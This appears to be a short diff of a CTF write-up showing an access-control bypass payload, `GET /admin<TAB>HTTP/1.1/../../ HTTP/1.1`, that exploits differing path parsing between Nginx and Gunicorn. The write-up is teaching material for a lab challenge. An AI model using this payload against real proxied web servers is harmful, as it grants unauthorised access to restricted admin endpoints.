act1on3/weird_proxies_ctf/WRITEUP.md

 Finally, payload is:
 `GET /admin<TAB>HTTP/1.1/../../ HTTP/1.1`

+Why it works:
-Nginx after path normalization: `/` - is not /admin so there is no restriction to access
+- Nginx after path normalization: `/` - is not /admin so there is no restriction to access
-Forward: `/admin<TAB>HTTP/1.1/../../`
+- Forward: `/admin<TAB>HTTP/1.1/../../`
-Gunicorn after path parsing: `/admin`
+- Gunicorn after path parsing: `/admin`

 ## Step #2